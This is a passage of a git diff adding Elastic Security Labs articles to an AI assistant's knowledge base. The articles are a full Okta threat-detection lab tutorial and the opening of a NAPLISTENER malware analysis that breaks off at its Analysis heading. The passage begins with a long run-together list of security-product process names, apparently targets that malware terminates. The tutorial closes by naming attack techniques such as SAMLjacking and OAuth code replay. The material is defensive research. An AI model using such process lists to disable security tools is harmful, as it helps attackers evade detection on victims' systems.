.exeexecstat.exefameh32.exefcappdb.exefcdblog.exefch32.exefchelper64.exefcsms.exefcssas.exefih32.exefirefox.exefirefoxconfig.exefiresvc.exefiretray.exefirewallgui.exefmon.exefnplicensingservice.exeforcefield.exefpavserver.exefprottray.exeframeworkservicframeworkservic.exeframeworkservice.exefrzstate2k.exefsaa.exefsaua.exefsav32.exefsavgui.exefscuif.exefsdfwd.exefsgk32.exefsgk32st.exefsguidll.exefsguiexe.exefshdll32.exefshoster32.exefshoster64.exefsm32.exefsma32.exefsmb32.exefsorsp.exefspc.exefspex.exefsqh.exefssm32.exefwcfg.exefwinst.exe | fws.exegcascleaner.exegcasdtserv.exegcasinstallhelper.exegcasnotice.exegcasserv.exegcasservalert.exegcasswupdater.exeGdfirewalltray.exegdfwsvc.exegdscan.exegfireporterservice.exeghost_2.exeghosttray.exegiantantispywaremain.exegiantantispywareupdater.exegooglecrashhandler.exegooglecrashhandler64.exegoogleupdate.exegziface.exegzserv.exehasplmv.exehdb.exehealthservice.exehpqwmiex.exehwapi.exeicepack.exeidsinst.exeiface.exeigateway.exeilicensesvc.exeinet_gethost.exeinfopath.exeinicio.exeinonmsrv.exeinorpc.exeinort.exeinotask.exeinoweb.exeisafe.exeisafinst.exeisntsmtp.exeisntsysmonitorispwdsvc.exeisqlplussvc.exeisscsf.exeissdaemon.exeissvc.exeisuac.exeiswmgr.exeitmrt_supportdiagnostics.exeitmrt_trace.exeitmrtsvc.exeixaptsvc.exeixavsvc.exeixfwsvc.exekabackreport.exekaccore.exekanmcmain.exekansgui.exekansvr.exekb891711.exekeysvc.exekis.exekislive.exekissvc.exeklnacserver.exeklnagent.exeklserver.exeklswd.exeklwtblfs.exekmailmon.exeknownsvr.exeknupdatemain.exekpf4gui.exekpf4ss.exekpfw32.exekpfwsvc.exekrbcc32s.exekswebshield.exekvdetech.exekvmonxp.kxpkvmonxp_2.kxpkvolself.exekvsrvxp.exekvsrvxp_1.exekvxp.kxpkwatch.exekwsprod.exekxeserv.exeleventmgr.exelivesrv.exelmon.exelog_qtine.exeloggetor.exeloggingserver.exeluall.exelucallbackproxy.exelucoms.exelucoms~1.exelucomserver.exelwdmserver.exemacmnsvc.exemacompatsvc.exemanagementagenthost.exemanagementagentnt.exemantispm.exemasalert.exemassrv.exemasvc.exembamservice.exembamtray.exemcagent.exemcapexe.exemcappins.exemcconsol.exemcdash.exemcdetect.exemcepoc.exemcepocfg.exemcinfo.exemcmnhdlr.exemcmscsvc.exemcnasvc.exemcods.exemcpalmcfg.exemcpromgr.exemcproxy.exemcregwiz.exemcsacore.exemcscript_inuse.exemcshell.exemcshield.exemcshld9x.exemcsvhost.exemcsysmon.exemctray.exemctskshd.exemcui32.exemcuimgr.exemcupdate.exemcupdmgr.exemcvsftsn.exemcvsrte.exemcvsshld.exemcwce.exemcwcecfg.exemfeann.exemfecanary.exemfeesp.exemfefire.exemfefw.exemfehcs.exemfemactl.exemfemms.exemfetp.exemfevtps.exemfewc.exemfewch.exemgavrtcl.exemghtml.exemgntsvc.exemonitoringhost.exemonsvcnt.exemonsysnt.exempcmdrun.exempf.exempfagent.exempfconsole.exempfservice.exempfsrv.exempftray.exemps.exempsevh.exempsvc.exemrf.exemsaccess.exemsascui.exemscifapp.exemsdtssrvr.exemsftesql.exemskagent.exemskdetct.exemsksrver.exemsksrvr.exemsmdsrv.exemsmpeng.exemspmspsv.exemspub.exemsscli.exemsseces.exemsssrv.exemusnotificationux.exemyagttry.exemydesktopqos.exemydesktopservice.exemysqld.exemysqld-nt.exemysqld-opt.exenailgpip.exenaprdmgr.exenavectrl.exenavelog.exenavesp.exenavshcom.exenavw32.exenavwnt.exencdaemon.exend2svc.exendetect.exendrvs.exendrvx.exeneotrace.exenerosvc.exenetalertclient.exenetcfg.exenetsession_win.exenetworkagent.exenexengctw32.exengserver.exenimbus.exenimcluster.exenip.exenipsvc.exenisoptui.exenisserv.exenissrv.exenisum.exenjeeves.exenlclient.exenlsvc.exenmagent.exenmain.exenortonsecurity.exenpfmntor.exenpfmsg.exenpfmsg2.exenpfsvice.exenpmdagent.exenprotect.exenpscheck.exenpssvc.exenrmenctb.exenscsrvce.exensctop.exenslocollectorservice.exensmdemf.exensmdmon.exensmdreal.exensmdsch.exensmdtr.exentcaagent.exentcadaemon.exentcaservice.exentevl.exentrtscan.exentservices.exenvcoas.exenvcsched.exenymse.exeoasclnt.exeocautoupds.exeocomm.exeocssd.exeoespamtest.exeofcdog.exeofcpfwsvc.exeokclient.exeolfsnt40.exeomniagent.exeomslogmanager.exeomtsreco.exeonenote.exeonlinent.exeonlnsvc.exeop_viewer.exeopscan.exeoracle.exeoutlook.exeoutpost.exepaamsrv.exepadfsvr.exepagent.exepagentwd.exepasystemtray.exepatch.exepatrolagent.exepatrolperf.exepavbckpt.exepavfires.exepavfnsvr.exepavjobs.exepavkre.exepavmail.exepavreport.exepavsched.exepavsrv50.exepavsrv51.exepavsrv52.exepavupg.exepaxton.net2.clientservice.exepaxton.net2.commsserverservice.exepccclient.exepccguide.exepcclient.exepccnt.exepccntmon.exepccntupd.exepccpfw.exepcctlcom.exepcscan.exepcscm.exepcscnsrv.exepcsws.exepctsauxs.exepctsgui.exepctssvc.exepctstray.exepep.exepersfw.exepmgreader.exepmon.exepnmsrv.exepntiomon.exePop3pack.exepop3trap.exepoproxy.exepowerpnt.exeppclean.exeppctlpriv.exe | ppmcativedetection.exeppppwallrun.exepqibrowser.exepqv2isvc.exepralarmmgr.exeprcalculationmgr.exeprconfigmgr.exeprdatabasemgr.exepremailengine.exepreventmgr.exeprevsrv.exeprftpengine.exeprgateway.exeprintdevice.exeprivacyiconclient.exeprlicensemgr.exeprocexp.exeproficy administrator.exeproficyclient.exe4proficypublisherservice.exeproficyserver.exeproficysts.exeproutil.exeprprintserver.exeprproficymgr.exeprrds.exeprreader.exeprrouter.exeprschedulemgr.exeprstubber.exeprsummarymgr.exeprunsrv.exeprwriter.exepsanhost.exepsctris.exepsctrls.exepsh_svc.exepshost.exepsimreal.exepsimsvc.exepskmssvc.exepsuamain.exepsuaservice.exepthosttr.exepview.exepviewer.exepwdfilthelp.exepxemtftp.exepxeservice.exeqclean.exeqdcsfs.exeqoeloader.exeqserver.exerapapp.exerapuisvc.exeras.exerasupd.exerav.exeravmon.exeravmond.exeravservice.exeravstub.exeravtask.exeravtray.exeravupdate.exeravxp.exercsvcmon.exerdrcef.exerealmon.exeredirsvc.exeregmech.exeremupd.exerepmgr64.exereportersvc.exereportingservicesservice.exereportsvc.exeretinaengine.exerfwmain.exerfwproxy.exerfwsrv.exerfwstub.exernav.exernreport.exerouternt.exerpcserv.exerscd.exerscdsvc.exersnetsvr.exerssensor.exerstray.exertvscan.exerulaunch.exesafeservice.exesahookmain.exesaservice.exesav32cli.exesavfmsectrl.exesavfmselog.exesavfmsesjm.exesavfmsesp.exesavfmsespamstatsmanager.exesavfmsesrv.exesavfmsetask.exesavfmseui.exesavmain.exesavroam.exesavscan.exesavservice.exesavui.exesbamsvc.exesbserv.exescan32.exescanexplicit.exescanfrm.exescanmailoutlook.exescanmsg.exescanwscs.exescfagent_64.exescfmanager.exescfservice.exescftray.exeschdsrvc.exeschupd.exesdrservice.exesdtrayapp.exeseanalyzertool.exeseccenter.exesecuritycenter.exesecuritymanager.exeseestat.exesemsvc.exeserver_eventlog.exeserver_runtime.exesesclu.exesetloadorder.exesetupguimngr.exesevinst.exesgbhp.exeshstat.exesidebar.exesiteadv.exeslee81.exesmc.exesmcgui.exesmex_activeupdasmex_master.exesmex_remoteconfsmex_systemwatcsmoutlookpack.exesms.exesmsectrl.exesmselog.exesmsesjm.exesmsesp.exesmsesrv.exesmsetask.exesmseui.exesmsx.exesnac.exesndmon.exesndsrvc.exesnhwsrv.exesnicheckadm.exesnichecksrv.exesnicon.exesnsrv.exespbbcsvc.exespideragent.exespiderml.exespidernt.exespiderui.exespntsvc.exespooler.exespyemergency.exespyemergencysrv.exesqbcoreservice.exesqlagent.exesqlbrowser.exesqlservr.exesqlwriter.exesrvload.exesrvmon.exesschk.exessecuritymanager.exessm.exessp.exessscheduler.exestarta.exesteam.exestinger.exestopa.exestopp.exestwatchdog.exesvcgenerichostsvcharge.exesvcntaux.exesvdealer.exesvframe.exesvtray.exeswc_service.exeswdsvc.exesweepsrv.sysswi_service.exeswnetsup.exeswnxt.exeswserver.exesymlcsvc.exesymproxysvc.exesymsport.exesymtray.exesymwsc.exesynctime.exesysdoc32.exesysoptenginesvc.exetaskhostw.exetbirdconfig.exetbmon.exetclproc.exetdimon.exeteamviewer_service.exetfgui.exetfservice.exetftray.exetfun.exethebat.exethebat64.exethunderbird.exetiaspn~1.exetmas.exetmlisten.exetmntsrv.exetmpfw.exetmproxy.exetnbutil.exetnslsnr.exetoolbarupdater.exetpsrv.exetraflnsp.exetraptrackermgr.exetrjscan.exetrupd.exetsansrf.exetsatisy.exetscutynt.exetsmpnt.exeucservice.exeudaterui.exeuiseagnt.exeuiwatchdog.exeumxagent.exeumxcfg.exeumxfwhlp.exeumxpol.exeunsecapp.exeunvet32.exeup2date.exeupdate_task.exeupdaterui.exeupdtnv28.exeupfile.exeuplive.exeuploadrecord.exeupschd.exeurl_response.exeurllstck.exeuseractivity.exeuseranalysis.exeusergate.exeusrprmpt.exev2iconsole.exev3clnsrv.exev3exec.exev3imscn.exev3lite.exev3main.exev3medic.exev3sp.exev3svc.exevetmsg.exevettray.exevgauthservice.exevisio.exevmacthlp.exevmtoolsd.exevmware-converter.exevmware-converter-a.exevmwaretray.exevpatch.exevpc32.exevpdn_lu.exevprosvc.exevprot.exevptray.exevrv.exevrvmail.exevrvmon.exevrvnet.exevshwin32.exevsmain.exevsmon.exevsserv.exevsstat.exevstskmgr.exewebproxy.exewebscanx.exewebsensecontrolservice.exewebtrapnt.exewfxctl32.exewfxmod32.exewfxsnt40.exewin32sysinfo.exewinlog.exewinroute.exewinvnc4.exewinword.exewordpad.exeworkflowresttest.exewrctrl.exewrsa.exewrspysetup.exewscntfy.exewssfcmai.exewtusystemsuport.exexcommsvr.exexfilter.exexfssvccon.exezanda.exezapro.exezavcore.exezillya.exezlclient.exezlh.exezonealarm.exezoolz.exe |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/monitoring_okta_threats_with_elastic_security.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/monitoring_okta_threats_with_elastic_security.md
new file mode 100644
index 0000000000000..c392f75a15498
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/monitoring_okta_threats_with_elastic_security.md
@@ -0,0 +1,300 @@
+---
+title: "Monitoring Okta threats with Elastic Security"
+subtitle: "Setup a detection engineering lab for Okta"
+slug: "monitoring-okta-threats-with-elastic-security"
+date: "2024-02-23"
+description: "This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta."
+author:
+  - slug: terrance-dejesus
+image: "photo-edited-03.png"
+category:
+  - slug: security-research
+---
+
+## Preamble
+
+Welcome to another installment of Okta threat research with Elastic. [Previously](https://www.elastic.co/security-labs/starter-guide-to-understanding-okta), we have published articles exploring Okta’s core services and offerings. This article is dedicated to the practical side of cyber defense - setting up a robust Okta threat detection lab. Our journey will navigate through the intricacies of configuring a lab environment using the Elastic Stack, integrating SIEM solutions, and seamlessly connecting with Okta.
+
+The goal of this article is not just to inform but to empower. Whether you're a seasoned cybersecurity professional or a curious enthusiast, our walkthrough aims to equip you with the knowledge and tools to understand and implement advanced threat detection mechanisms for Okta environments. We believe that hands-on experience is the cornerstone of effective cybersecurity practice, and this guide is crafted to provide you with a practical roadmap to enhance your security posture.
+
+As we embark on this technical expedition, remember that the world of cybersecurity is dynamic and ever-evolving. The methods and strategies discussed here are a reflection of the current landscape and best practices. We encourage you to approach this guide with a mindset of exploration and adaptation, as the techniques and tools in cybersecurity are continually advancing.
+
+So, let's dive into our detection lab setup for Okta research.
+
+## Prerequisites
+
+For starters, an Okta license (a [trial license](https://www.okta.com/free-trial/) is fine) is required for this lab setup. This will at least allow us to generate Okta system logs within our environment, which we can then ingest into our Elastic Stack.
+
+Secondarily, after Okta is set up, we can deploy a Windows Server, set up Active Directory (AD), and use the [AD integration](https://help.okta.com/en-us/content/topics/directory/ad-agent-main.htm) in Okta to sync AD with Okta for Identity and Access Management (IAM). This step is not necessary for the rest of the lab, however, it can help extend our lab for other exercises and scenarios where endpoint and Okta data are both necessary for hunting.
+
+## Sign up for Okta Workforce Identity
+
+We will set up a fresh Okta environment for this walkthrough by signing up for a Workforce Identity Cloud trial. If you already have an Okta setup in your environment, then feel free to skip to the `Setting Up the Elastic Stack` section.
+
+Once signed up for the trial, you are typically presented with a URL containing a trial license subdomain and the email to log into the Okta admin console.
+
+To start, users must pivot over to the email they provided when signing up and follow the instructions of the activation email by Okta, which contains a QR code to scan. 
+
+The QR code is linked to the Okta Verify application that is available on mobile devices, iOS and Android. A prompt on the mobile device for multi-factor authentication (MFA) using a phone number and face recognition is requested. 
+
+![Setting up Okta Verify through a mobile device](/assets/images/monitoring-okta-threats-with-elastic-security/image23.png)
+
+_Image 1: Setting up Okta Verify through a mobile device_
+
+Once set up, we are redirected to the Okta admin console to configure MFA using Okta Verify.
+
+![The Okta Admin console](/assets/images/monitoring-okta-threats-with-elastic-security/image9.png)
+
+_Image 2: The Okta Admin console_
+
+At this point, you should have a trial license for Okta, have setup MFA, and have access to the Okta admin console.
+
+## Setting up your free cloud stack
+
+For this lab, we will use a [free trial](https://cloud.elastic.co/registration) of an Elastic Cloud instance. You also have the option to create the stack in [Amazon Web Services](https://www.elastic.co/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&utm_content=Elasticsearch-AWS&utm_source=adwords-s&utm_medium=paid&device=c&utm_term=amazon%20elk&gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB) (AWS), [GCP](https://www.elastic.co/guide/en/cloud/current/ec-billing-gcp.html), or Microsoft Azure if you’d like to set up your stack in an existing cloud service provider (CSP). Ensure you [enable MFA for your Elastic Cloud environment](https://www.elastic.co/guide/en/cloud/current/ec-account-user-settings.html#ec-account-security-mfa).
+
+Once registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment okta-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:
+
+ - Name: okta-threat-detection
+ - Cloud provider: Google Cloud
+ - Region: Iowa (us-central1)
+ - Hardware profile: Storage optimized
+ - Version: 8.12.0 (latest)
+
+The option to adjust additional settings for Elasticsearch, Kibana, Integrations, and more is configurable during this step. However, default settings are fine for this lab exercise. If you choose to leverage the Elastic Stack for a more permanent, long-term strategy, we recommend planning and designing architecturally according to your needs.
+
+Once set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP (or whatever cloud provider you selected). You can download the displayed credentials as a CSV file or save them wherever you see fit. The deployment takes approximately 5 minutes to complete and once finished, you can select “Continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!
+
+![Your newly deployed Elastic stack](/assets/images/monitoring-okta-threats-with-elastic-security/image14.png)
+
+_Image 3: Your newly deployed Elastic stack_
+
+## Setup Fleet from the Security Solution
+
+As a reminder, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) enables the creation and management of an agent policy, which will incorporate the [Okta integration](https://docs.elastic.co/en/integrations/okta) on an Elastic Agent. This integration is used to access and ingest Okta logs into our stack.
+
+### Create an Okta policy
+
+For our Elastic Agent to know which integration it is using, what data to gather, and where to stream that data within our stack, we must first set up a custom Fleet policy we’re naming Okta.
+
+To set up a fleet policy within your Elastic Stack, do the following in your Elastic Stack:
+
+ 1. Navigation menu > Management > Fleet > Agent Policies > Create agent policy
+ 2. Enter “Okta” as a name > Create Agent Policy
+
+![Fleet agent policies page in Elastic Stack](/assets/images/monitoring-okta-threats-with-elastic-security/image19.png)
+
+_Image 4: Fleet agent policies page in Elastic Stack_
+
+## Setup the Okta integration
+
+Once our policy is established, we need to install the Okta integration for the Elastic Stack we just deployed.
+
+By selecting the “Okta” name in the agent policies that was just created, we need to add the Okta integration by selecting “Add integration” as shown below.
+
+![The Okta integration within the agent policies](/assets/images/monitoring-okta-threats-with-elastic-security/image17.png)
+
+_Image 5: The Okta integration within the agent policies_
+
+Typing “Okta” into the search bar will show the Okta integration that needs to be added. Select this integration and the following prompt should appear.
+
+![The Okta Integration page](/assets/images/monitoring-okta-threats-with-elastic-security/image22.png)
+
+_Image 6: The Okta Integration page_
+
+By selecting “Add Okta” we can now begin to set up the integration with a simple step-by-step process, complimentary to adding our first integration in the Elastic Stack.
+
+![Adding integrations into the Elastic Stack](/assets/images/monitoring-okta-threats-with-elastic-security/image7.png)
+
+_Image 7: Adding integrations into the Elastic Stack_
+
+## Install the Elastic Agent on an endpoint
+
+As previously mentioned, we have to install at least one agent on an endpoint to access data in Okta, associated with the configured Okta policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP, to keep everything in the same environment. For this publication, I will use a VM instance of [Ubuntu 20.04 LTS](https://releases.ubuntu.com/focal/) VM in Google’s Compute Engine (GCE). Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic Agent.
+
+Select the “Install Elastic Agent” button and select which host the agent will be installed on. For this example, we will be using a Linux host. Once selected, a “Copy” option is available to copy and paste the commands into your Linux console, followed by execution.
+
+![Install Elastic Agent](/assets/images/monitoring-okta-threats-with-elastic-security/image24.png)
+
+_Image 8: Install Elastic Agent_
+
+## Create an Okta token
+At this point, we need an API key and an Okta system logs API URL for the integration setup. Thus, we must pivot to the Okta admin console to create the API token.
+
+![Access the Okta Admin console](/assets/images/monitoring-okta-threats-with-elastic-security/image5.png)
+
+_Image 9: Access the Okta Admin console_
+
+From the Okta admin console, select the following:
+
+ 1. Security > API > Tokens
+ 2. Select the “Create token” button
+
+In this instance, we name the API token “elastic”. Since my administrator account creates the token, it inherits the permissions and privileges of my account. In general, we recommend creating a separate user and scoping permissions properly with principle-of-least-privilege (PoLP) for best security practices. I recommend copying the provided API token key to the clipboard, as it is necessary for the Okta integration setup.
+
+![Copy your API token](/assets/images/monitoring-okta-threats-with-elastic-security/image16.png)
+
+_Image 10: Copy your API token_
+
+We also need to capture the Okta API Logs URL, which is our HTTPS URL with the URI ```/api/v1/logs``` or system logs API endpoint.
+
+For example: ```https://{okta-subdomain}.okta.com/api/v1/logs```
+
+The Elastic Agent, using the Okta integration, will send requests to this API URL with our API token included in the authorization header of the requests as a Single Sign-On for Web Systems (SSWS) token. With this information, we are ready to finalize our Okta integration setup in the Elastic Stack.
+
+## Add Okta integration requirements
+
+Pivoting back to the Okta integration setup in the Elastic Stack, it requires us to add the API token and the Okta System logs API URL as shown below. Aside from this, we change the “Initial Interval” from 24 hours to 2 minutes. This will help check for Okta logs immediately after we finish our setup.
+
+![Configure log collection](/assets/images/monitoring-okta-threats-with-elastic-security/image12.png)
+
+_Image 11: Configure log collection_
+
+Once this information is submitted to the Okta integration setup, we can select the “Confirm incoming data” button to verify that logs are properly being ingested from the Elastic Agent.
+
+![Preview data from Okta](/assets/images/monitoring-okta-threats-with-elastic-security/image11.png)
+
+_Image 12: Preview data from Okta_
+
+While we have confirmed that data is in fact being ingested from the Elastic Agent, we must also confirm that we have Okta-specific logs being ingested. I would suggest that you take a moment to pivot back to Okta and change some settings in the admin console. This will then generate Okta system logs that will eventually be extracted by our Elastic Agent and ingested into our Elastic Stack. Once completed, we can leverage the Discover feature within Kibana to search for the Okta system logs that should have been generated.
+
+The following query can help us accomplish this - ```event.dataset:okta*```
+
+![Use Discover to explore your Okta data](/assets/images/monitoring-okta-threats-with-elastic-security/image13.png)
+
+_Image 13: Use Discover to explore your Okta data_
+
+If you have managed to find Okta logs from this, then congratulations rockstar, you have successfully completed these steps:
+
+ 1. Signed up for Okta Workforce Identity with a trial license
+ 2. Deployed a trial Elastic stack via cloud.elastic.co
+ 3. Deployed an agent to your host of choice
+ 4. Created an Okta policy
+ 5. Setup the Okta integration
+ 6. Created an Okta API token
+ 7. Confirmed incoming data from our Elastic agent
+
+## Enable Okta detection rules
+
+Elastic has 1000+ pre-built detection rules not only for Windows, Linux, and macOS endpoints, but also for several integrations, including Okta. You can view our current existing Okta [rules](https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta) and corresponding MITRE ATT&CK [coverage](https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-oktaWILDCARD.json&leave_site_dialog=false&tabs=false).
+
+To enable Okta rules, complete the following in the Elastic Stack:
+
+ 1. Navigation menu > Security > Manage > Rules
+ 2. Select “Load Elastic prebuilt rules and timeline templates”
+ 3. Once all rules are loaded:
+   a. Select “Tags” dropdown
+   b. Search “Okta”
+   c. Select all rules > Build actions dropdown > Enable
+
+![Searching for Out-of-the-Box (OOB) Okta Detection Rules](/assets/images/monitoring-okta-threats-with-elastic-security/image15.png)
+
+_Image 14: Searching for Out-of-the-Box (OOB) Okta Detection Rules_
+
+While we won’t go in-depth about exploring all rule information, we recommend [doing so](https://www.elastic.co/guide/en/security/current/detection-engine-overview.html). Elastic has additional information, such as related integrations, investigation guides, and much more! Also, you can add to our community by [creating your own](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) detection rule with the “Create new rule” button and [contribute](https://github.com/elastic/detection-rules#how-to-contribute) it to our detection rules repository.
+
+## Let’s trigger a pre-built rule
+
+After all Okta rules have been enabled, we can now move on to testing alerts for these rules with some simple emulation.
+
+For this example, let’s use the [Attempt to Reset MFA Factors for an Okta User Account](https://github.com/elastic/detection-rules/blob/main/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml) detection rule that comes fresh out-of-the-box (OOB) with prebuilt detection rules.
+
+![Enabling an OOB Okta detection rule to test alerting](/assets/images/monitoring-okta-threats-with-elastic-security/image15.png)
+
+_Image 15: Enabling an OOB Okta detection rule to test alerting_
+
+To trigger, we simply log into our Okta admin console and select a user of choice from Directory > People and then More Actions > Reset Multifactor > Reset All.
+
+![Resetting MFA for a user in Okta](/assets/images/monitoring-okta-threats-with-elastic-security/image18.png)
+
+_Image 16: Resetting MFA for a user in Okta_
+
+Once complete, logs will be ingested shortly into the Elastic Stack, and the Detection Engine will run the rule’s query against datastreams whose patterns match ```logs-okta*```. If all goes as expected, an alert should be available via the Security > Alerts page in the Elastic stack.
+
+![Alert page flyout for triggered OOB Okta detection rule](/assets/images/monitoring-okta-threats-with-elastic-security/image1.png)
+
+_Image 17: Alert page flyout for triggered OOB Okta detection rule_
+
+## Let’s trigger a custom rule
+
+It is expected that not all OOTB Okta rules may be right for your environment or detection lab. As a result, you may want to create custom detection rules for data from the Okta integration.  Allow me to demonstrate how you would do this.
+
+Let’s assume we have a use case where we want to identify when a unique user ID (Okta Actor ID) has an established session from two separate devices, indicating a potential web session hijack.
+
+For this, we will rely on Elastic’s piped query language, [ES|QL](https://www.elastic.co/blog/getting-started-elasticsearch-query-language). We can start by navigating to Security > Detection Rules (SIEM) > Create new rules. We can then select ES|QL as the rule type.
+
+![Create new rule Kibana page in Elastic security solution](/assets/images/monitoring-okta-threats-with-elastic-security/image2.png)
+
+_Image 18: Create new rule Kibana page in Elastic security solution_
+
+To re-create Okta system logs for this event, we would log in to Okta with the same account from multiple devices relatively quickly. For replication, I have done so via macOS and Windows endpoints, as well as my mobile phone, for variety.
+
+The following custom ES|QL query would identify this activity, which we can confirm via Discover in the Elastic Stack before adding it to our new rule.
+
+![Testing ES|QL query in Elastic Discover prior to rule implementation](/assets/images/monitoring-okta-threats-with-elastic-security/image6.png)
+
+_Image 19: Testing ES|QL query in Elastic Discover prior to rule implementation_
+
+Now that we have adjusted and tested our query and are happy with the results, we can set it as the query for our new rule.
+
+![Creating new custom detection rule with ES|QL query logic](/assets/images/monitoring-okta-threats-with-elastic-security/image21.png)
+
+_Image 20: Creating new custom detection rule with ES|QL query logic_
+
+![Enabled custom detection rule with ES|QL query for Okta threat](/assets/images/monitoring-okta-threats-with-elastic-security/image8.png)
+
+_Image 21: Enabled custom detection rule with ES|QL query for Okta threat_
+
+Now that our rule has been created, tested, and enabled, let’s attempt to fire an alert by replicating this activity. For this, we simply log into our Okta admin console from the same device with multiple user accounts.
+
+As we can see, we now have an alert for this custom rule!
+
+![Triggered alert for events matching custom detection rule](/assets/images/monitoring-okta-threats-with-elastic-security/image4.png)
+
+_Image 22: Triggered alert for events matching custom detection rule_
+
+## Bonus: synchronize Active Directory (AD)
+
+As discussed in our [previous Okta installation](https://www.elastic.co/security-labs/starter-guide-to-understanding-okta), a core service offering in Okta is to synchronize with third-party IAM directory services such as AD, Google Workspace, and others. Doing so in your lab can enable further threat detection capabilities as cross-correlation between Windows logs and Okta for users would be possible. For this article, we will step through synchronizing with AD on a local Windows Server. Note - We recommend deploying a Windows Elastic Agent to your Windows Server and setting up the [Windows](https://docs.elastic.co/en/integrations/windows) and [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) integrations for additional log ingestion.
+
+ 1. [Setup](https://www.linkedin.com/pulse/how-install-active-directory-domain-services-windows-server-2019-/) your Windows Server (we are using WinServer 2019)
+ 2. Deploy the Okta AD agent from your Okta admin console
+   a. Directory > Directory Integrations
+   b. Add Directory > Add Active Directory
+ 3. Walk through guided steps to install Okta AD agent on Windows Server
+   a. Execution of the Okta Agent executable will require a setup on the Windows Server side as well
+ 4. Confirm Okta AD agent was successfully deployed
+ 5. Synchronize AD with Okta
+   a. Directory > Directory Integrations
+   b. Select new AD integration
+   c. elect “Import Now”
+Choose incremental or full import
+ 6. Select which users and groups to import and import them
+
+![Successful Okta agent deployment and synchronization with AD](/assets/images/monitoring-okta-threats-with-elastic-security/image10.png)
+
+_Image 23: Successful Okta agent deployment and synchronization with AD_
+
+Once finished, under Directory in the Okta admin console, you should see people and groups that have been successfully imported. From here, you can emulate attack scenarios such as stolen login credentials locally (Windows host) being used to reset MFA in Okta.
+
+## Additional considerations
+
+While this is a basic setup of not only the Elastic Stack, Okta integration, and more for a threat research lab, there are additional considerations for our setup that are dependent on our research goals. While we won't dive into specifics nor exhaust possible scenarios, below is a list of considerations for your lab to accurately emulate an enterprise environment and/or adversary playbooks:
+
+ - Is Okta my IdP source of truth? If not, set up a third party such as Azure AD (AAD) or Google Workspace and synchronize directory services.
+ - Will I simulate adversary behavior - for example, SAMLjacking? If so, what third-party integrations do I need that leverage SAML for authentication?
+ - Do I want to research tenant poisoning? If so, should I set up a multi-tenant architecture with Okta?
+ - Do I need separate software, such as VPNs or proxies, to emulate attribution evasion when attempting to bypass MFA?
+ - What other tools, such as EvilGinx, let me attempt phishing playbooks, and what is the required set up in Okta for these exercises?
+ - How should I capture authorization codes during OAuth workflows, and how can I replay an exchange request for an access token?
+ - For password spraying or credential stuffing, which third-party applications should I integrate, and how many should suffice for accurate detection logic?
+ - How might I explore lax access policies for user profiles?
+
+## Takeaways
+
+In this guide, we've successfully navigated the setup of an Okta threat detection lab using the Elastic Stack, highlighting the importance of safeguarding SaaS platforms like Okta. Our journey included deploying the Elastic Stack, integrating and testing Okta system logs, and implementing both pre-built and custom detection rules.
+
+The key takeaway is the Elastic Stack's versatility in threat detection, accommodating various scenarios, and enhancing cybersecurity capabilities. This walkthrough demonstrates that effective threat management in Okta environments is both achievable and essential.
+
+As we wrap up, remember that the true value of this exercise lies in its practical application. By establishing your own detection lab, you're not only reinforcing your security posture but also contributing to the broader cybersecurity community. Stay tuned for additional threat research content surrounding SaaS and Okta, where we'll explore common adversary attacks against Okta environments and detection strategies.
+
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/naplistener_more_bad_dreams_from_the_developers_of_siestagraph.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/naplistener_more_bad_dreams_from_the_developers_of_siestagraph.md
new file mode 100644
index 0000000000000..c5f4be429ef43
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/naplistener_more_bad_dreams_from_the_developers_of_siestagraph.md
@@ -0,0 +1,96 @@
+---
+title: "NAPLISTENER: more bad dreams from developers of SIESTAGRAPH"
+slug: "naplistener-more-bad-dreams-from-the-developers-of-siestagraph"
+date: "2023-06-27"
+description: "Elastic Security Labs observes that the threat behind SIESTAGRAPH has shifted priorities from data theft to persistent access, deploying new malware like NAPLISTENER to evade detection."
+author:
+  - slug: remco-sprooten
+image: "blog-thumb-filtered-lens.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware analysis
+  - naplisitener
+  - siestagraph
+---
+
+### Introduction
+
+While continuing to monitor the [REF2924](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) activity group, Elastic Security Labs observed that the attacker shifted priorities from data theft to persistent access using several mechanisms. On January 20, 2023, a new executable `Wmdtc.exe` was created and installed as a Windows Service using a naming convention similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service ( `Msdtc.exe` ).
+
+`Wmdtc.exe` is an HTTP listener written in C#, which we refer to as NAPLISTENER. Consistent with SIESTAGRAPH and other malware families developed or used by this threat, NAPLISTENER appears designed to evade network-based forms of detection. _Notably, network- and log-based detection methods are common in the regions where this threat is primarily active (southern and southeastern asia)._
+
+### Analysis
+
